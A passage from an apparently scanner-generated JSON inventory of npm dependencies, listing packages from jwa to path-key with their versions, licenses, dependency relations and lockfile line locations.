"lodash.isstring@4.0.1", "lodash.once@4.1.1", "ms@2.1.3", "semver@7.7.4" ], "Locations": [ { "StartLine": 6633, "EndLine": 6654 } ], "AnalyzedBy": "npm" }, { "ID": "jwa@2.0.1", "Name": "jwa", "Identifier": { "PURL": "pkg:npm/jwa@2.0.1", "UID": "d39d5a86964d241f" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "buffer-equal-constant-time@1.0.1", "ecdsa-sig-formatter@1.0.11", "safe-buffer@5.2.1" ], "Locations": [ { "StartLine": 6655, "EndLine": 6665 } ], "AnalyzedBy": "npm" }, { "ID": "jwks-rsa@3.2.2", "Name": "jwks-rsa", "Identifier": { "PURL": "pkg:npm/jwks-rsa@3.2.2", "UID": "c2cd72e435f92f00" }, "Version": "3.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/jsonwebtoken@9.0.10", "debug@4.4.3", "jose@4.15.9", "limiter@1.1.5", "lru-memoizer@2.3.0" ], "Locations": [ { "StartLine": 6666, "EndLine": 6681 } ], "AnalyzedBy": "npm" }, { "ID": "jws@4.0.1", "Name": "jws", "Identifier": { "PURL": "pkg:npm/jws@4.0.1", "UID": "c51a6390a687c195" }, "Version": "4.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "jwa@2.0.1", "safe-buffer@5.2.1" ], "Locations": [ { "StartLine": 6682, "EndLine": 6691 } ], "AnalyzedBy": "npm" }, { "ID": "leac@0.6.0", "Name": "leac", "Identifier": { "PURL": "pkg:npm/leac@0.6.0", "UID": "2c0aceb28c2204de" }, "Version": "0.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6702, "EndLine": 6710 } ], "AnalyzedBy": "npm" }, { "ID": "lilconfig@3.1.3", "Name": "lilconfig", "Identifier": { "PURL": "pkg:npm/lilconfig@3.1.3", "UID": "6014129744f20f69" }, "Version": "3.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6725, "EndLine": 6736 } ], "AnalyzedBy": "npm" }, { "ID": "limiter@1.1.5", "Name": "limiter", "Identifier": { "PURL": "pkg:npm/limiter@1.1.5", "UID": "58d645ec733b8d24" }, "Version": "1.1.5", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6737, "EndLine": 6741 } ], "AnalyzedBy": "npm" }, { "ID": "linebreak@1.1.0", "Name": "linebreak", "Identifier": { "PURL": "pkg:npm/linebreak@1.1.0", "UID": "3282c73f2cc14b7b" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "base64-js@0.0.8", "unicode-trie@2.0.0" ], "Locations": [ { "StartLine": 6742, "EndLine": 6751 } ], "AnalyzedBy": "npm" }, { "ID": "lines-and-columns@1.2.4", "Name": "lines-and-columns", "Identifier": { "PURL": "pkg:npm/lines-and-columns@1.2.4", "UID": "3c51cf42a57e27f2" }, "Version": "1.2.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6761, "EndLine": 6766 } ], "AnalyzedBy": "npm" }, { "ID": "locate-path@5.0.0", "Name": "locate-path", "Identifier": { "PURL": "pkg:npm/locate-path@5.0.0", "UID": "f3537cb7b16eba07" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-locate@4.1.0" ], "Locations": [ { "StartLine": 8215, "EndLine": 8226 } ], "AnalyzedBy": "npm" }, { "ID": "lodash@4.18.1", "Name": "lodash", "Identifier": { "PURL": "pkg:npm/lodash@4.18.1", "UID": "d9e335047081399" }, "Version": "4.18.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6800, "EndLine": 6805 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.camelcase@4.3.0", "Name": "lodash.camelcase", "Identifier": { "PURL": "pkg:npm/lodash.camelcase@4.3.0", "UID": "66f5ff87471fe75b" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6806, "EndLine": 6812 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.clonedeep@4.5.0", "Name": "lodash.clonedeep", "Identifier": { "PURL": "pkg:npm/lodash.clonedeep@4.5.0", "UID": "54115aef20a16f33" }, "Version": "4.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6813, "EndLine": 6818 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.defaults@4.2.0", "Name": "lodash.defaults", "Identifier": { "PURL": "pkg:npm/lodash.defaults@4.2.0", "UID": "ca34b64d6d72406e" }, "Version": "4.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6819, "EndLine": 6824 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.includes@4.3.0", "Name": "lodash.includes", "Identifier": { "PURL": "pkg:npm/lodash.includes@4.3.0", "UID": "29242fdb16188852" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6825, "EndLine": 6830 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.isarguments@3.1.0", "Name": "lodash.isarguments", "Identifier": { "PURL": "pkg:npm/lodash.isarguments@3.1.0", "UID": "38f783522d5fc767" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6831, "EndLine": 6836 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.isboolean@3.0.3", "Name": "lodash.isboolean", "Identifier": { "PURL": "pkg:npm/lodash.isboolean@3.0.3", "UID": "515bf8ad074c5b62" }, "Version": "3.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6837, "EndLine": 6842 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.isinteger@4.0.4", "Name": "lodash.isinteger", "Identifier": { "PURL": "pkg:npm/lodash.isinteger@4.0.4", "UID": "81d1dc406769dde8" }, "Version": "4.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6843, "EndLine": 6848 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.isnumber@3.0.3", "Name": "lodash.isnumber", "Identifier": { "PURL": "pkg:npm/lodash.isnumber@3.0.3", "UID": "3cfb9ab4cffd163b" }, "Version": "3.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6849, "EndLine": 6854 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.isplainobject@4.0.6", "Name": "lodash.isplainobject", "Identifier": { "PURL": "pkg:npm/lodash.isplainobject@4.0.6", "UID": "cae6c5d960e21df3" }, "Version": "4.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6855, "EndLine": 6860 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.isstring@4.0.1", "Name": "lodash.isstring", "Identifier": { "PURL": "pkg:npm/lodash.isstring@4.0.1", "UID": "226247c14ca6603f" }, "Version": "4.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6861, "EndLine": 6866 } ], "AnalyzedBy": "npm" }, { "ID": "lodash.once@4.1.1", "Name": "lodash.once", "Identifier": { "PURL": "pkg:npm/lodash.once@4.1.1", "UID": "93c8d8e5ad4a4615" }, "Version": "4.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6874, "EndLine": 6879 } ], "AnalyzedBy": "npm" }, { "ID": "long@5.3.2", "Name": "long", "Identifier": { "PURL": "pkg:npm/long@5.3.2", "UID": "3813befd6d718426" }, "Version": "5.3.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6880, "EndLine": 6886 } ], "AnalyzedBy": "npm" }, { "ID": "loose-envify@1.4.0", "Name": "loose-envify", "Identifier": { "PURL": "pkg:npm/loose-envify@1.4.0", "UID": "27bc2cb119e18028" }, "Version": "1.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "js-tokens@4.0.0" ], "Locations": [ { "StartLine": 6887, "EndLine": 6898 } ], "AnalyzedBy": "npm" }, { "ID": "lru-cache@10.4.3", "Name": "lru-cache", "Identifier": { "PURL": "pkg:npm/lru-cache@10.4.3", "UID": "7e6ea77379e69add" }, "Version": "10.4.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7734, "EndLine": 7739 } ], "AnalyzedBy": "npm" }, { "ID": "lru-cache@6.0.0", "Name": "lru-cache", "Identifier": { "PURL": "pkg:npm/lru-cache@6.0.0", "UID": "6c25c3fc6ed4e03d" }, "Version": "6.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "yallist@4.0.0" ], "Locations": [ { "StartLine": 6909, "EndLine": 6920 } ], "AnalyzedBy": "npm" }, { "ID": "lru-memoizer@2.3.0", "Name": "lru-memoizer", "Identifier": { "PURL": "pkg:npm/lru-memoizer@2.3.0", "UID": "1961c4bb7939f12d" }, "Version": "2.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lodash.clonedeep@4.5.0", "lru-cache@6.0.0" ], "Locations": [ { "StartLine": 6921, "EndLine": 6930 } ], "AnalyzedBy": "npm" }, { "ID": "lucide-react@0.376.0", "Name": "lucide-react", "Identifier": { "PURL": "pkg:npm/lucide-react@0.376.0", "UID": "33a24d87ccac7686" }, "Version": "0.376.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "react@18.3.1" ], "Locations": [ { "StartLine": 6931, "EndLine": 6939 } ], "AnalyzedBy": "npm" }, { "ID": "math-intrinsics@1.1.0", "Name": "math-intrinsics", "Identifier": { "PURL": "pkg:npm/math-intrinsics@1.1.0", "UID": "e552eccbea809738" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6957, "EndLine": 6965 } ], "AnalyzedBy": "npm" }, { "ID": "media-engine@1.0.3", "Name": "media-engine", "Identifier": { "PURL": "pkg:npm/media-engine@1.0.3", "UID": "309dde0880831b39" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6966, "EndLine": 6971 } ], "AnalyzedBy": "npm" }, { "ID": "media-typer@0.3.0", "Name": "media-typer", "Identifier": { "PURL": "pkg:npm/media-typer@0.3.0", "UID": "68b1b3bdc3191ee3" }, "Version": "0.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6972, "EndLine": 6980 } ], "AnalyzedBy": "npm" }, { "ID": "merge-descriptors@1.0.3", "Name": "merge-descriptors", "Identifier": { "PURL": "pkg:npm/merge-descriptors@1.0.3", "UID": "3b172e25f3915e11" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6981, "EndLine": 6989 } ], "AnalyzedBy": "npm" }, { "ID": "merge2@1.4.1", "Name": "merge2", "Identifier": { "PURL": "pkg:npm/merge2@1.4.1", "UID": "d22b40fc0e8fcf2f" }, "Version": "1.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6997, "EndLine": 7005 } ], "AnalyzedBy": "npm" }, { "ID": "methods@1.1.2", "Name": "methods", "Identifier": { "PURL": "pkg:npm/methods@1.1.2", "UID": "a4b3aed0fbd199ca" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7006, "EndLine": 7014 } ], "AnalyzedBy": "npm" }, { "ID": "micromatch@4.0.8", "Name": "micromatch", "Identifier": { "PURL": "pkg:npm/micromatch@4.0.8", "UID": "45ab8bbdff0a2a4f" }, "Version": "4.0.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "braces@3.0.3", "picomatch@2.3.2" ], "Locations": [ { "StartLine": 7015, "EndLine": 7027 } ], "AnalyzedBy": "npm" }, { "ID": "mime@1.6.0", "Name": "mime", "Identifier": { "PURL": "pkg:npm/mime@1.6.0", "UID": "2f68fb882478deb1" }, "Version": "1.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8864, "EndLine": 8875 } ], "AnalyzedBy": "npm" }, { "ID": "mime@3.0.0", "Name": "mime", "Identifier": { "PURL": "pkg:npm/mime@3.0.0", "UID": "b289121a87dd63b5" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7028, "EndLine": 7040 } ], "AnalyzedBy": "npm" }, { "ID": "mime-db@1.52.0", "Name": "mime-db", "Identifier": { "PURL": "pkg:npm/mime-db@1.52.0", "UID": "75fe89a9f41cef7a" }, "Version": "1.52.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7041, "EndLine": 7049 } ], "AnalyzedBy": "npm" }, { "ID": "mime-types@2.1.35", "Name": "mime-types", "Identifier": { "PURL": "pkg:npm/mime-types@2.1.35", "UID": "16b15d4c7031473b" }, "Version": "2.1.35", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mime-db@1.52.0" ], "Locations": [ { "StartLine": 7050, "EndLine": 7061 } ], "AnalyzedBy": "npm" }, { "ID": "minimatch@9.0.9", "Name": "minimatch", "Identifier": { "PURL": "pkg:npm/minimatch@9.0.9", "UID": "bb2acce8069d2075" }, "Version": "9.0.9", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "brace-expansion@2.1.0" ], "Locations": [ { "StartLine": 4762, "EndLine": 4776 }, { "StartLine": 6553, "EndLine": 6567 } ], "AnalyzedBy": "npm" }, { "ID": "minimist@1.2.8", "Name": "minimist", "Identifier": { "PURL": "pkg:npm/minimist@1.2.8", "UID": "eee717e6227aaa43" }, "Version": "1.2.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7088, "EndLine": 7096 } ], "AnalyzedBy": "npm" }, { "ID": "minipass@7.1.3", "Name": "minipass", "Identifier": { "PURL": "pkg:npm/minipass@7.1.3", "UID": "7848ca63fd2d06e5" }, "Version": "7.1.3", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7097, "EndLine": 7105 } ], "AnalyzedBy": "npm" }, { "ID": "mkdirp@0.5.6", "Name": "mkdirp", "Identifier": { "PURL": "pkg:npm/mkdirp@0.5.6", "UID": "95afa5e2512f2c68" }, "Version": "0.5.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "minimist@1.2.8" ], "Locations": [ { "StartLine": 7106, "EndLine": 7117 } ], "AnalyzedBy": "npm" }, { "ID": "morgan@1.10.1", "Name": "morgan", "Identifier": { "PURL": "pkg:npm/morgan@1.10.1", "UID": "eb2ec93f106e38e3" }, "Version": "1.10.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "basic-auth@2.0.1", "debug@2.6.9", "depd@2.0.0", "on-finished@2.3.0", "on-headers@1.1.0" ], "Locations": [ { "StartLine": 7138, "EndLine": 7153 } ], "AnalyzedBy": "npm" }, { "ID": "ms@2.0.0", "Name": "ms", "Identifier": { "PURL": "pkg:npm/ms@2.0.0", "UID": "355f8f0ad80281ff" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3730, "EndLine": 3735 }, { "StartLine": 5304, "EndLine": 5309 }, { "StartLine": 5507, "EndLine": 5512 }, { "StartLine": 7163, "EndLine": 7168 }, { "StartLine": 8858, "EndLine": 8863 } ], "AnalyzedBy": "npm" }, { "ID": "ms@2.1.3", "Name": "ms", "Identifier": { "PURL": "pkg:npm/ms@2.1.3", "UID": "fc70816a322bbbce" }, "Version": "2.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7181, "EndLine": 7186 } ], "AnalyzedBy": "npm" }, { "ID": "multer@1.4.5-lts.2", "Name": "multer", "Identifier": { "PURL": "pkg:npm/multer@1.4.5-lts.2", "UID": "9de8074040ba33ce" }, "Version": "1.4.5-lts.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "append-field@1.0.0", "busboy@1.6.0", "concat-stream@1.6.2", "mkdirp@0.5.6", "object-assign@4.1.1", "type-is@1.6.18", "xtend@4.0.2" ], "Locations": [ { "StartLine": 7187, "EndLine": 7205 } ], "AnalyzedBy": "npm" }, { "ID": "mz@2.7.0", "Name": "mz", "Identifier": { "PURL": "pkg:npm/mz@2.7.0", "UID": "997b882c580d717e" }, "Version": "2.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "any-promise@1.3.0", "object-assign@4.1.1", "thenify-all@1.6.0" ], "Locations": [ { "StartLine": 7206, "EndLine": 7216 } ], "AnalyzedBy": "npm" }, { "ID": "nanoid@3.3.11", "Name": "nanoid", "Identifier": { "PURL": "pkg:npm/nanoid@3.3.11", "UID": "a9f52f741169f2d2" }, "Version": "3.3.11", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7217, "EndLine": 7234 } ], "AnalyzedBy": "npm" }, { "ID": "negotiator@0.6.3", "Name": "negotiator", "Identifier": { "PURL": "pkg:npm/negotiator@0.6.3", "UID": "15732bdeb7800824" }, "Version": "0.6.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7242, "EndLine": 7250 } ], "AnalyzedBy": "npm" }, { "ID": "next@14.2.3", "Name": "next", "Identifier": { "PURL": "pkg:npm/next@14.2.3", "UID": "2c2120133d592351" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@next/env@14.2.3", "@next/swc-darwin-arm64@14.2.3", "@next/swc-darwin-x64@14.2.3", "@next/swc-linux-arm64-gnu@14.2.3", "@next/swc-linux-arm64-musl@14.2.3", "@next/swc-linux-x64-gnu@14.2.3", "@next/swc-linux-x64-musl@14.2.3", "@next/swc-win32-arm64-msvc@14.2.3", "@next/swc-win32-ia32-msvc@14.2.3", "@next/swc-win32-x64-msvc@14.2.3", "@opentelemetry/api@1.9.1", "@swc/helpers@0.5.5", "busboy@1.6.0", "caniuse-lite@1.0.30001791", "graceful-fs@4.2.11", "postcss@8.4.31", "react-dom@18.3.1", "react@18.3.1", "styled-jsx@5.1.1" ], "Locations": [ { "StartLine": 7251, "EndLine": 7301 } ], "AnalyzedBy": "npm" }, { "ID": "node-cron@3.0.3", "Name": "node-cron", "Identifier": { "PURL": "pkg:npm/node-cron@3.0.3", "UID": "a562da4bae8a63e3" }, "Version": "3.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "uuid@8.3.2" ], "Locations": [ { "StartLine": 7340, "EndLine": 7351 } ], "AnalyzedBy": "npm" }, { "ID": "node-fetch@2.7.0", "Name": "node-fetch", "Identifier": { "PURL": "pkg:npm/node-fetch@2.7.0", "UID": "11fe02f85ab0d5c1" }, "Version": "2.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "whatwg-url@5.0.0" ], "Locations": [ { "StartLine": 7362, "EndLine": 7381 } ], "AnalyzedBy": "npm" }, { "ID": "node-forge@1.4.0", "Name": "node-forge", "Identifier": { "PURL": "pkg:npm/node-forge@1.4.0", "UID": "5945ab4d4d02174d" }, "Version": "1.4.0", "Licenses": [ "(BSD-3-Clause OR GPL-2.0)" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7382, "EndLine": 7390 } ], "AnalyzedBy": "npm" }, { "ID": "node-releases@2.0.38", "Name": "node-releases", "Identifier": { "PURL": "pkg:npm/node-releases@2.0.38", "UID": "dfb5d4dcddd86c71" }, "Version": "2.0.38", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7391, "EndLine": 7396 } ], "AnalyzedBy": "npm" }, { "ID": "nodemailer@6.10.1", "Name": "nodemailer", "Identifier": { "PURL": "pkg:npm/nodemailer@6.10.1", "UID": "cdb0ca30dd5d0b41" }, "Version": "6.10.1", "Licenses": [ "MIT-0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7397, "EndLine": 7405 } ], "AnalyzedBy": "npm" }, { "ID": "nopt@7.2.1", "Name": "nopt", "Identifier": { "PURL": "pkg:npm/nopt@7.2.1", "UID": "d76967a27786d4d5" }, "Version": "7.2.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "abbrev@2.0.0" ], "Locations": [ { "StartLine": 7406, "EndLine": 7420 } ], "AnalyzedBy": "npm" }, { "ID": "normalize-path@3.0.0", "Name": "normalize-path", "Identifier": { "PURL": "pkg:npm/normalize-path@3.0.0", "UID": "47ef5c57a1d31733" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7421, "EndLine": 7429 } ], "AnalyzedBy": "npm" }, { "ID": "normalize-svg-path@1.1.0", "Name": "normalize-svg-path", "Identifier": { "PURL": "pkg:npm/normalize-svg-path@1.1.0", "UID": "6f54a8e290bd072c" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "svg-arc-to-cubic-bezier@3.2.0" ], "Locations": [ { "StartLine": 7430, "EndLine": 7438 } ], "AnalyzedBy": "npm" }, { "ID": "object-assign@4.1.1", "Name": "object-assign", "Identifier": { "PURL": "pkg:npm/object-assign@4.1.1", "UID": "72c6ace6c5b60745" }, "Version": "4.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7468, "EndLine": 7476 } ], "AnalyzedBy": "npm" }, { "ID": "object-hash@3.0.0", "Name": "object-hash", "Identifier": { "PURL": "pkg:npm/object-hash@3.0.0", "UID": "6fdabdc5361e64ef" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7477, "EndLine": 7485 } ], "AnalyzedBy": "npm" }, { "ID": "object-inspect@1.13.4", "Name": "object-inspect", "Identifier": { "PURL": "pkg:npm/object-inspect@1.13.4", "UID": "5468df4f8353771e" }, "Version": "1.13.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7486, "EndLine": 7497 } ], "AnalyzedBy": "npm" }, { "ID": "on-finished@2.3.0", "Name": "on-finished", "Identifier": { "PURL": "pkg:npm/on-finished@2.3.0", "UID": "c4e1a68272dda53e" }, "Version": "2.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ee-first@1.1.1" ], "Locations": [ { "StartLine": 7169, "EndLine": 7180 } ], "AnalyzedBy": "npm" }, { "ID": "on-finished@2.4.1", "Name": "on-finished", "Identifier": { "PURL": "pkg:npm/on-finished@2.4.1", "UID": "711ceabe8e4310df" }, "Version": "2.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ee-first@1.1.1" ], "Locations": [ { "StartLine": 7498, "EndLine": 7509 } ], "AnalyzedBy": "npm" }, { "ID": "on-headers@1.1.0", "Name": "on-headers", "Identifier": { "PURL": "pkg:npm/on-headers@1.1.0", "UID": "bba55f9642068dee" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7510, "EndLine": 7518 } ], "AnalyzedBy": "npm" }, { "ID": "once@1.4.0", "Name": "once", "Identifier": { "PURL": "pkg:npm/once@1.4.0", "UID": "817fbef84079c0c7" }, "Version": "1.4.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "wrappy@1.0.2" ], "Locations": [ { "StartLine": 7519, "EndLine": 7528 } ], "AnalyzedBy": "npm" }, { "ID": "otplib@12.0.1", "Name": "otplib", "Identifier": { "PURL": "pkg:npm/otplib@12.0.1", "UID": "692ad1e65cdad42c" }, "Version": "12.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@otplib/core@12.0.1", "@otplib/preset-default@12.0.1", "@otplib/preset-v11@12.0.1" ], "Locations": [ { "StartLine": 7563, "EndLine": 7573 } ], "AnalyzedBy": "npm" }, { "ID": "p-limit@2.3.0", "Name": "p-limit", "Identifier": { "PURL": "pkg:npm/p-limit@2.3.0", "UID": "ffbfa2fb2bf2962b" }, "Version": "2.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-try@2.2.0" ], "Locations": [ { "StartLine": 8227, "EndLine": 8241 } ], "AnalyzedBy": "npm" }, { "ID": "p-limit@3.1.0", "Name": "p-limit", "Identifier": { "PURL": "pkg:npm/p-limit@3.1.0", "UID": "53c1f9caa5d04708" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "yocto-queue@0.1.0" ], "Locations": [ { "StartLine": 7574, "EndLine": 7589 } ], "AnalyzedBy": "npm" }, { "ID": "p-locate@4.1.0", "Name": "p-locate", "Identifier": { "PURL": "pkg:npm/p-locate@4.1.0", "UID": "25a915e04bd4fbc2" }, "Version": "4.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "p-limit@2.3.0" ], "Locations": [ { "StartLine": 8242, "EndLine": 8253 } ], "AnalyzedBy": "npm" }, { "ID": "p-try@2.2.0", "Name": "p-try", "Identifier": { "PURL": "pkg:npm/p-try@2.2.0", "UID": "f58bb62e80a5e559" }, "Version": "2.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7606, "EndLine": 7614 } ], "AnalyzedBy": "npm" }, { "ID": "package-json-from-dist@1.0.1", "Name": "package-json-from-dist", "Identifier": { "PURL": "pkg:npm/package-json-from-dist@1.0.1", "UID": "ecbdaaa75c6fc8f3" }, "Version": "1.0.1", "Licenses": [ "BlueOak-1.0.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7615, "EndLine": 7620 } ], "AnalyzedBy": "npm" }, { "ID": "pako@0.2.9", "Name": "pako", "Identifier": { "PURL": "pkg:npm/pako@0.2.9", "UID": "6f64c5f06c2de6c9" }, "Version": "0.2.9", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10191, "EndLine": 10196 } ], "AnalyzedBy": "npm" }, { "ID": "pako@1.0.11", "Name": "pako", "Identifier": { "PURL": "pkg:npm/pako@1.0.11", "UID": "a78a79ad4ff37c73" }, "Version": "1.0.11", "Licenses": [ "(MIT AND Zlib)" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7621, "EndLine": 7626 } ], "AnalyzedBy": "npm" }, { "ID": "parse-svg-path@0.1.2", "Name": "parse-svg-path", "Identifier": { "PURL": "pkg:npm/parse-svg-path@0.1.2", "UID": "1f36720769241312" }, "Version": "0.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7640, "EndLine": 7645 } ], "AnalyzedBy": "npm" }, { "ID": "parseley@0.12.1", "Name": "parseley", "Identifier": { "PURL": "pkg:npm/parseley@0.12.1", "UID": "2976baf7d1dac784" }, "Version": "0.12.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "leac@0.6.0", "peberminta@0.9.0" ], "Locations": [ { "StartLine": 7646, "EndLine": 7658 } ], "AnalyzedBy": "npm" }, { "ID": "parseurl@1.3.3", "Name": "parseurl", "Identifier": { "PURL": "pkg:npm/parseurl@1.3.3", "UID": "ded4ae01725bd7f8" }, "Version": "1.3.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7659, "EndLine": 7667 } ], "AnalyzedBy": "npm" }, { "ID": "path-exists@4.0.0", "Name": "path-exists", "Identifier": { "PURL": "pkg:npm/path-exists@4.0.0", "UID": "e1e1cee162dc7b9a" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7668, "EndLine": 7676 } ], "AnalyzedBy": "npm" }, { "ID": "path-expression-matcher@1.5.0", "Name": "path-expression-matcher", "Identifier": { "PURL": "pkg:npm/path-expression-matcher@1.5.0", "UID": "e02ae21eeb5fd294" }, "Version": "1.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7677, "EndLine": 7692 } ], "AnalyzedBy": "npm" }, { "ID": "path-key@3.1.1", "Name": "path-key", "Identifier": { "PURL": "pkg:npm/path-key@3.1.1", "UID": "a5675ba27842e303" }, "Version": "3.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { 